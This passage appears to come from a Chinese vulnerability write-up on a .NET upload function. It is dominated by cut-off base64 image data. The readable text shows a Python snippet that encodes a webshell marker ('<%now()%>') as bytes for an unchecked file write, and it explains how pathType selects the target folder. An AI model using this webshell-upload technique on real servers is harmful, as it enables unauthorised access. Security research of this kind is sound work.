QAPVxtUl62+4QdhXV1cpRY35rDv3NkCwC8vAhTCg6QuwSRI9XIxdhcT5aung/wO8ELOepmOzd4B9/4zlrYzwpXxIwDbRVnufF/YJXe5DsNVSnkV9GnTnh8AEP1jx67vAaxcffwEQIhLunn5UvvRYztEefa+oP3Y3h8HmJCTgsOWdgBBnZWyODCcODzjmbh68/TOx5+viI+TpCD0wb4KiumR88ObGub99PGvAKCrfVeF3G3s2mfQdtzRJmp1h8+ug21HbQUOflSzp1xlsdgoT1MnD3ngbH5NLADpd1jx7N/nUdy5s/0wwLVfPy7BQRMAwKPHKwDwg11iDJo4VHa85zwCK5WjJcizMHF824TqG2GofCyGth08ffdZo3UjBN8jWqdi1B18bwhgxpPMvb9L2g5WoKZOrBcpqjx4pdYdZEv/JNcPoOON3lNTBFkxww4+8GS9VpVt3OblpqR7nqxCITnoCisfbcifbXJOpZwgHM3y2BdJ6Fyb/s2FQhEqxW9XwOb1LI+li5MdDT1dC1ZfivNJnzB6HNFnq/Tsm8kzVwHgT/bsED/+QFAg7ubPd8HEcfflp0QYU9bplVRVa/OBI0GQTetQuvSzU2csbftit3a2HwbK95n7Qr1S67L9/T/rApj54twFzzVJDJOkJI1H+NvSGLeb5w55rhGZVCn39cuffCVqh8+uDMG1M5ZzuU0t8NPUyX3bPvi1oAELFoWNkIu1HfKA8gwS6XdZz5Y0WtIdguVDUE/lfZg8VIhRpDLErk7psnefrd19dtomNtfMz0Sb/81z+7adu7ReScvf7vr07rO1z4KCn1ttZw59SYyYylF3YDhxGGDiuOXUiqIW+mz2qLs1sa1tn2NCaOT60+FnYoWBbso6rjIC2136PuBWR4B96LG7ojl+acHc847eTqH4gFM5yzfgz06TYti8gnMaHq4WdbTq8qOHAL09GxCBVp+7cHHzld3KXn8EUbGpMpuKKnJMgBRMRDb7oQ+Er4i79Ae7tgPYThCL5X7iJjxzFQDGP6qoEJBHxNSERz5jD2x3fTQkXyfnhYg1siI7jn4UFPyRXa73iOKlSooKniIV/GAGiOtdFXIlbEH0wpfEltG4YIW6C831N8d2GOdOfP9ivkIxjuzaWaHAJDqMNLjwregiFWLQFCFXnlSJaHtij4ihUrFbIHlzSWpCMU5eWpdj0Ii/fMYh1bR0yU0uym1CYseU/U41F+kOIThr/5mranuG8AgpQ2XNVZGUIthNaC6pJR0TABP5R6ZqnUg8IGt3n91xpvYru1LIRTXqhIxAa5XZZTkCqhg041HXCLnYB5Bp3EEDkFtJAiSXKRGliY0yiopq6Z/kIr1Jfz
<p blockindex=26>因在在最后的<code>SingleBase&lt;fileServices&gt;.Instance.UploadFile(fs, FileName, pathType)</code>中</p>
<p blockindex=27><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAt8AAAGDCAIAAAB8zOuCAAAgAElEQVR4nO3dQYglyXng8dB6WGw3lkGGZTUMPVi+bIGX6YuhBnx62KguizFsU+igaUYHPWhwy74MNoIWblhG9GHlacOD3oPE20H40Aezt1oE72SYAl/asKBDsV5mqhj5YoNsyjYGwx7CHYqO+CLyi8zIzMh8/x9Nky8qMiLeq1cvvxfxZeYX7t69awAAAJrx7+YeAAAAwGuITgAAQFsKopPb05PxxgEAAGAxdwIAANpCdAIAANpSEJ3cufzxSIN497u/riwEAACr98bcAzDvfvfXP/nD/6MpDCr4D1OVbbV8UxW5UXX2mKoZD1isqS800otZtLu4Y1AzLvdLBr7+wfjrDt7fMW6k832YH3bnkDI1p/wVK991qWE7QQulDeal/pbF8on/8OOuNb2P8Xs3Jb/Nfr93YBrzRye92cNJcCAU60wzHv+TIn9US9V02/FGv0IjHUKKdg+41zyoGTfi1xxyjB978H5hUKH6OAc+o5F+xcp3XSx+PYOfxg97/zGm3kv6V6xHX0PG2dnOGL93ca/qv3dgGjOfs9Nv4sS8/tm3jr+i4NBeq9kWXpwhMeJkwaXY9ZTRbW9DfsUV33XjvdPiqFfZewtv/vHkPznzz32kTxugogXPnYjyc5h+eVDiJjnF2c5+f8DxqoFysrfxz4uB07/613OM+CAevD8Jp/kFTfZmmMzw8Yjf6TUN9n4vuR39wYuFQX3T9SGQ2n0pv/egl/z8zQTjAfqZMzrpPXGiaTBoJ7Uk4bZtBXGSs/d4gk71R75pplVTM8OdOw5cARn1S7am91kGX/pmGOITKYcmZfg6SNy7WJ7pukfv4phTT0QMnsQPgdRIFvF7N9nfpmZRDGhHQXQy3jk7ExD/VuNq1f9Ki74wTfMZ4Q9J/GI3wTFeQ9/+eIOvO20z5bdn/VG/yoJO4yt3/iufmlCZpvcJ+hLL47cBEQkat7aVHdE0gciCLGWRXvyaK6o+eDIEizQ4kSZ2JM61rB5vYCzRbFdjq76sk+EWblIjqd6j33i+9+mlZrbjwjz9k+r3a7Wvm90xv/vwwU8wFWSafDO0I/Oa+K/YwOWn1Ivfe5VT2fuMv3fxzxxo3xfu3r2rrHp7elJxcWd4dCKurKfS3OLJ1c6aJvF9Sz8kcQFFP/ixC8WlLmUckHqC7qfBsT9oZMhvWf+MlIOPR3WEbwZNYf4JxuX+T8VCZUd+zdS6jHgAzhd2PgUxS6NTa7/3olde/+sAxjZPdDLlxAkAAFiW2eZOAAAARAXRCQAAwASO4pwdLMsv3vmFu195c+5RVPbZX3/+j7f/NPcoAGAZiE7QnLtfefM//M7X/v727+YeSDVfvPOl3WbzG+//aVD+S5/++SzjAfAPb/9uXMifZDsKohPyTjCZv7/9u7/96d/MPQoAwDxmu94JcMz+8ge/N3YXh1fEhwAm+DNEb62v7Jw+vjDGXD45E8tTP4oLO9178cx/+PL+o9IWhhipd9dsUYOHw2Gz2aReeT3xd2Qb79z3f/30D+3Gb5rf/wvzJ25brNxZQcm24/fo+C3/hfmT4GFp73/5g9+zqzzDX+Q8/6W22/roxNXU/L6m1O8PXCS+Gv7ztRXikrhmvv2bm5u33npLv+N4Kr56tdhX6ebm5r333hN/5Kv70v3G+3/q/hjRmoK5k1mWdVJ/SJdPzjI/6tGRPX6/vP/I/gvChVhnhVF71zcrxiWZ9l30MPwjTPwdbTYbzQHyd375u+bV8d7/X/Sb5vcHxiWuHX/DNhu3HJQM6b30RXYB39j8o/IE0y1Fz6viwdUd6jabjXjYi8tTNfPtB331GWslyldvvHdaPIGXf0GePn1qjLm5uRlpPGgWKzv4GeXExkDKAKUdVUIfZ1nf1YoOxkt3VE92ETabzcXFhdse47djp0+qN4vh5lnZCQJzG877s9zBjHdmHUdsNqjmd5dvQVwKCQrdQ7vhF2a2MxtFvQeFcVNxs+ITjKuJoYn4kuoLU2yAUvpZEyy4dAYN4ppLvlBsxNUsWsTRVw5eOv9h/BU2XgwqeuU7+YFjfl3D9JoGCP4Y3UPxT95ViF+ZTDWxo86BBU+2aAUnv8snn3zy7rvvnp2FY4jr5xcyegzJp3z1Ur+RWOlo828to15MdNWePn36wQcfZGpWfPUwvYK5k9vTk1q92ne8nfkXP1mCP4mgZqbZVBpKZiXI51ZYXMm9F8+CBRe3XOKvm/i7xNuukbgkiDM6ew8K872LTzAevEnPmsSvvP965gvzesygBAsumZDCvIoqgpqdhUELcTyknEcRO0oR/xCC/90bOHgn93jl8/xvqMG3VXdE6f3hHv8xpp6XO1KKlVPV4jekKQlNfKVPM3hxOt/bYn27bdcy7P9+UnNR+zHlq5f6jcTi90l+tJm3ljHG5uVonp3b8eLiQmxQOR40rvWs2LqUAYo9/LuS4VkgccSQiiE0vcdx0nD9JjOGmLg7y8YWneFCj8qx3juaV19n3f/5ypMlo9g3ifitVyk+BHbWVzbbYzC+WquN+kb6HSbHOKyOkSTb79kVJfQcDoezszM7d9JjcgvtO67opJ+Jz9/R9O5PwNTqaMoAZZbQxHIrNUUxSg/+jr/SrwmdKU/BcEed3r9B//t65cG93kvp+VBV3pCpRsTox8V5pTHNIvR4dmNb0KsH0+w5OyN9HVQ2mzprRlk4cK6ls3c/E2Vg70HlaT5KWghNJu7Uf6jMwstPnIjv5LEnUYKJk+BKKpoW8ik1pt5TCJaEJqZ5QYZMQcWXsenRiFK/34jm2Q0c+WazKZo4SfW7rCz1ozLbXQBTOWtxopZYM5NXm6mc+bQSU1+DNNhgoiKV1hqnvsYtxz/V9x63qek9VTl+KVz0kP8ddRaKvw5NaPKf/vOv/fxvffVvf/o3cWKpf6QXC8XyTAJsfh4lzkTp3Ffs/Vd++T/+9//yX92HoPtA/KVP/zyTvClGJ/qsWPGl1rz+qdTXTEqsMuLMP1mTePNk3lFiuJNKoY1lMiVTKZ+ZVNB8HqgL/VOvp2OTPf2UT7E1f6ilL77pevWM9E6L5d8SQeX4iQfPK8hyzT9rI8VAyvHYcnsl+yA64Ur27ZgzOpnrmw0a56KT+EezTH4MF0Qn5tVnYv6jcODfSOoYUH3iasbJsBT/pVv3R828L/6QGaAxei8azz+8/bvxxAnRSTsKopOK99mpew4kViYVndS6Juz04ujEEj8K+euogpdxbHOdo5uZQyoaD3cBbNw8WbF8XqCHxQUl/fDXUQUv49jmmjLJpB5PPBKMinN20KIv3vnS3EOo6Yt3vvT+h/9z7lEAwGLMlncCpPzinV+4+5U35x5FZZ/99ef/ePtPc48CAJZh/uhku90aY54/fz7vMAAAQCPmvwvg+fl5O5frAQAAs5vnPjuBq6urkVoGAACLM//cCQAAgG/m6GS/39u8EwAAAGv+rNgGLzQJAABmxMoOAABoC9EJAABoy/zn7FxfX+/3+zFaBgAASzT/lewfPHgw9xAAAEBDWNkBAABtmf+cHQAAAN/Mcye3b57OOwAAANAaVnYAAEBbZj5n587nl9XbBAAAizb/OTu13HvxzH/48v6jFfTumi1q0F5+9/TxhTHm8slZ795tC0Eji7i2b3DX61oDds22/woAwKKtZ2XHHr9f3n9k/wXhQqyzwqi965sV45JM+y56GBKXWJdPzuJGNptNcOyvom6b9hXYvFKrcdtaXD7GCwIAx6wgOrlz+ePq3ZMVW9c0ExsjBSgAAFjrWdmxxKWQoNA9tBt+YWY7s1HUe1AYNxU3Kz7BuJoYmoirM/rCFBug5CMhG8G4UMZVDtZH3EO/Wud2ZiMYQFFh3FTcbPwcU9UWsQoGAA2a+Xont2+eVkyMvffimT3SB3GAe5ja7qxppNjCBRP+hqZ3faFmqFYqNHGhhtvWF4oPOzsNKpgoDvDDFHG7s2bcpvGCCX8jaFZsU1+oGSoAYLiCuZPb05PqiztjnLMjhgjD2+ws0ffuT5bUyp/
<p blockindex=28>会直接将byte类型直接通过<code>WriterTo</code>写入，所以可以用python生成一个webshell的字节数据</p>
<pre blockindex=29><code class="hljs language-php">webshell = <span class=hljs-string>'&lt;%now()%&gt;'</span>
<span class=hljs-keyword>print</span>(str([ord(x) <span class=hljs-keyword>for</span> x in webshell]).replace(<span class=hljs-string>' '</span>, <span class=hljs-string>''</span>))
</code></pre>
<p blockindex=30><img src=data:image/png;base64,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
<p blockindex=31>然后在看写入的路径</p>
<p blockindex=32><img src=data:image/png;base64,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
<p blockindex=33>写入的路径是通过传入的<code>pathType</code>决定的，在<code>GetFolderPathByType</code>中定义了<code>pathType</code>的值对应的路径</p>
<p blockindex=34><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAmkAAAHTCAIAAADzqhgLAAAgAElEQVR4nO3dP6gkSX7g8eybMeZu0C6s4NAMQ4uWHDVIyFoogazi4MrbkVV7xvRDVjIPRLf10Dk9zHO0lNWNoIayRDIsyNOcV3JSzsG9Q9bBguAKbtDVQyNHEivxVu00e0bchGLiX0ZkRkZmRn0/NE2+qMiIqOrX7/d+kb/KevT48ePK7WH19P27v/F06OH3fvLb/+OPfxbSGH5679EGUifyT2rt2flSWHv6Gzu/9M8e+zRDJuqn93MPWbzrdHHcb+VjLCn8le9cxhivZ4jhL2bI8lJ9sw08N/+/+3g/Q+D37tQLSOD3fvLb4kD7hzfbtRbxpfhZqZ3e+9tIncIc1nPKhN+1gb+OiIPeL8u0T1AcyDXIADnqr2I9vhkWRPuxKw5CnmDv7yV5ovpiWhu1/lXXDwHX6Yv4dx/4fxP95I6dyX9n9PzepP1kNI9FB+uvYL3Xo00a/nN51Ogi/w9X7h8uISMMeVnCO7t+3FhXG/IUci7eM+8kP9r8/+4DY4OkxSH/ub0THev/FNd/H2tot/4QcK1kKf/u4a8nUTahjtiZfMM2J+t/J7Nb8m+jqF8283wTu35ghf/IqwZHoHDajzP19bT+Rp82fIb/PhEic8ZpPkfPv7u1f4iobxvrIvudGEV95fv9vphq9rEn6tGZ7dnhStiztcoTJssw/5fFusLky+baT5T8eXy/iax5ajH4Rp3Kv8s52RgX+V3klqxrJclnVAf3z75c4U+qd4WIp7FzF85PW3yeNLrgb4bhPK+J+ooN/F5yvfi9LwEEzj6Hf3ci63ge5ayzHR47Qy7eeC7Ud/asHL+rhi/JursYvvhsjeFXPjqfoHzUWpohB+n3eqqN1h34qAs85veD9V9nod8MrmdkLklr9I/peYJme8hcsd97rh1X6zP1N3Y+Ba3nIv7dXf+1rfMGjolO+WJnzqQTAIDxZM07AQAoQEfsBAAAmmLrbJfoP7z/7x//xodTrwL/5v/+n7/7xcO/Tr0KALND7JyRx7/x4X/80X/554d/nHohqKqq+t77P/jX/3n/s//9c639V/72LyZZz5z9y6//gdnIC4WCdcROrndm9s8P//gPP//7qVcBAPDJ+v5OYNH++s/+aOolzBcvDi7KHPdsVy+PVVXd3W6s7a6HzMZsks/+36tX4uD3qxf9TpQ8I/hnEY9GLUCbvd/itbOixhy4AL+//rM/+uEf/qnaMu13nVXbtlVV3d/fP3v2zPqQar1eJ5z6h3/4p+ZLBJSqI++cZMPW9fPo7nbjeSjtGmScDpE8cP5+9SLw5741WojTO0fw9+kReLTZzUCuCQl1sWPK/lEr7yfw3z3qeylK27ZaRPSHw91uV1XV/f39SOsBLgd7tvPy337+x/Ln/vAAkCeEzIf6fMdOOhdnvV4fj0d5nDbpFETqmXxYYIby7dlqv32L39nV7Vltq9azQ2sdVuumThc4gugpv7SuR3ZQ19zZLXZJVtoWq/zStbkq8lfX6SETeWZX5w3Z3Y1afOeA6mghO89aT02PVynw3931vWTyb6iqj4p2tUUca7FQdvDHSNltt9vd3Nx4evrXA1yarPcVUq8PyePwRuuXnX38F6VcPV2zVAFXW7Wfnq4D02/9zm/+5Q//yhUD1KBlPZYt8jjkFM+X8tgze+WIPSGzuxavTZrtGWmNP/r+T/7pZ78Q71FR80751ouQf3ezm4saAkOOzS/VRtFudmjbVrsaGjuv9Vi+R8X6QgHlmWOtUFr+H1tqohDyAy4wXxx+BdSV54UwQ85wIUmbvyVwPZ6rnpUS3kQeKf/2DxjYM3yRLmOUDpmJZvhZgT3btt1sNiLvDDwxdj1AYcqPnZ0608FUs3Ru3KnMn/WxF/DSXvAbOJo1iZwh9Wn+6oTr+C6Z3s0nYrFViws3ozrbkcoR/cOqF66sPVOtSsT